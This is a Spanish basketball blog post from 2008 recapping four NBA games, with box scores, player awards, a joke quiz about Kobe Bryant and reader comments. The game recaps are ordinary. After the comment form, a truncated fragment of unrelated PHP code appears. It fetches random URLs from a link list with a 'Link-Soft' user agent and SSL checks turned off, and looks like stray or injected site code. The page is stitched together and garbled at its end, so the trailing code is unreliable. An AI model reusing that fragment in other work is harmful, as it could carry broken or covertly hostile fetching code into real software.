La crónica (31/01/08)

01 de February de 2008 por txusma

El jueves nos dejó cuatro interesantes partidos, elegidos por la televisión y todos con un punto de morbo o atractivo. Jugaron los cinco grandes candidatos al anillo y el resultado fue pocos puntos y mucha emoción. Antes de la crónica, veamos el vídeo de resumen:

Box-Scores:

Lakers 89 – 90 Pistons

Mavs 90 – 96 Celtics

Cavs 95 – 101 Sonics

Spurs 84 – Suns 81

La crónica:

Prince anotando un triple a 4.4 segundos para el final La visita de los Lakers a Auburn Hills, el primer partido de una gira de 9 partidos para los angelinos, tenía todas las trazas de acabar como de costumbre. Los Pistons abrieron brecha pronto y alcanzaron una renta de 17 puntos. Sin embargo, Lakers remontó de la mano de Kobe Bryant, quien cometió 11 pérdidas de balón pero sumó 39 puntos, 10 rebotes y 5 asistencias, y afrontó el tramo final con una ventaja corta. Pero Prince, el mejor local, atrapó un rebote ofensivo y anotó un triple a 4.4 segundos para el final para poner a los Pistons por delante. Lakers dispuso de una última posesión, en la que Odom, como guinda a una actuación desastrosa, lanzó un airball y, con él, las opciones de su equipo de iniciar esta larguísima gira con un triunfo.

Rondo anotando frente a NowitzkyEn Boston, de nuevo sin Garnett, los Celtics recibieron a uno de los candidatos al trono del Oeste y demostraron de qué son capaces sin su nuevo estandarte. Allen y Pierce lograron 26 puntos cada uno y Rondo logró 14 y 12 rebotes, incluyendo una jugada decisiva, a menos de un minuto para el final, en la que robó un rebote ofensivo a Nowitzki y anotó para poner por delante a los locales. El alemán fue, por su parte, el más destacado del partido con 31 puntos, 11 rebotes, 6 asistencias y 3 tapones. El partido empezó con protagonismo por parte de Josh Howard y Ray Allen, quienes se han quedado fuera del All-Star Game, pero en la segunda mitad fueron Pierce y Nowitzki, sí seleccionados para la cita en New Orleans, los que tomaron las riendas. Al final, sin embargo, fue Rondo quien inclinó la balanza.

LeBron en el banquillo Sin Varejao, sin Pavlovic… y sin LeBron. Los Cavs cayeron en su visita a Seattle, donde no pudieron contar con su estrella debido a la torcedura que se produjo en Portland. En lugar de LeBron, el protagonismo lo tomó Larry Hughes, que con 28 puntos, 6 rebotes y 5 asistencias recordó que sabe jugar a esto del baloncesto y que le pagan una millonada por hacerlo. Sin embargo Cleveland perdió debido principalmente a la escasa aportación del resto del equipo, donde sólo Ilgauskas con 17 puntos y 9 rebotes aportó algo interesante. Seattle aprovechó bien la falta de liderazgo del equipo de Cleveland anotando 40 puntos en el primer cuarto y alcanzando una renta máxima de 22 puntos en la primera mitad. La diferencia se mantuvo Shawn Marion machacando el aro de los Spursen el tercer cuarto y al comienzo del cuarto final Seattle ganaba por 17. En ese momento los Cavaliers terminaron de despertar e iniciaron la remontada pero no llegaron a tiempo. Seattle, capitaneados por Durant con 24 puntos y por Wilcox, con 18 y 13 rebotes, se hicieron con el partido.

Partido tenso el disputado en Phoenix, rememorando el enfrentamiento entre ambos equipos en los playoffs del año pasado entre Suns y Spurs. Aun con el público abucheandoles continuamente y con la baja sensible de Tony Parker, los Spurs se llevaron un encuentro en el que fueron a remolque hasta el último cuarto y que estuvo muy marcado por los tiros libres. Los 12 de 12 de Ginobili, 4 de ellos en los últimos segundos y los 5 fallados por Stoudemire, 4 de ellos en el último cuarto, condicionaron fuertemente el resultado final. El mejor del partido fue Marion con 21 puntos y 10 rebotes, bien acompañado por Nash con 17 puntos y 8 asistencias y Stoudemire con 16 y 9 rebotes. Por San Antonio, Ginóbili se fue hasta 19 puntos, 7 rebotes y 6 pérdidas, Duncan 16 puntos, 17 rebotes y 6 asistencias para ser el mejor base de su equipo y Vaughn hasta 17.

Seguimos con los premios del día:

MVP: No ha podido evitar la derrota de su equipo pero es que hoy nadie podrá objetar nada al hecho de que Kobe Bryant ha jugado casi solo contra los Pistons. 39 puntos, 10 rebotes y 5 asistencias. Lástima de las 11 pérdidas. ¿Se contabiliza esto como un triple doble?

Rookie: 8 de 8 en tiros, 3 rebotes, 3 asistencias, 17 puntos y siendo compañero de Kevin Durant. Jeff Green tiene muchas cosas que decir en el futuro.

Sorpresa: Íbamos a comentar otro gran partido de Rajon Rondo pese a que no es una sorpresa porque esta cuajando una gran temporada, pero ver los números de Larry Hughes nos ha transportado al pasado instantáneamente. 28 puntos, 6 rebotes, 5 asistencias y 3 robos. Para Larry cualquier tiempo pasado fue mejor.

Decepción: Por esconderse, por no tirar más de 5 veces a canasta, por no coger más de 7 rebotes, por no ser decisivo, por no anotar más de 6 puntos, por no ayudar a Kobe, por dejar que Fisher sea el delfín del 24 en estos momentos, por no tocar ni aro en el tiro que pudo dar la victoria a los Lakers… por todas estas cosas… Lamar Odom.

Y ahí va nuestra adivinanza de hoy: ¿Qué puede estar pasando por la cabeza de Kobe?

kobe pensando

A) “¡¡Pero si no ha dado ni el aro!! Tenía que haberlo hecho yo, como siempre”.

B) “Byyyynuuum. Creo que me he pasado, parezco Penélope Cruz llamando a Almodovar”.

C) “Ya está, lo he decidido, Odom por Kidd”

D) “Ya está, lo he decidido, todos menos Bynum por Kidd”

E) “Ya está, lo he decidido, Kupchak por Kidd”

F) “¿Y qué tal me quedará el verde?”

El ganador recibirá un vídeo con los grandes aciertos de Kupchak y los buzzer-beaters de Odom de gran duración, un par de minutos.

Para acabar, las 10 mejores acciones de la pasada madrugada:

Comenta

3 comentarios a esta entrada

  1. txusma dice:
    #1

    Jojojojo… Me encantan los pasatiempos!!

      Citar

  2. MagicJohnson32 dice:
    #2

    Odom Go Home!

    Es de Nueva York ¿no? Pues mira, que se vaya a New Jersey, que le pilla cerca de casa…

      Citar

  3. xapa_croack dice:
    #3

    tremendo el triple doble de kobe

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>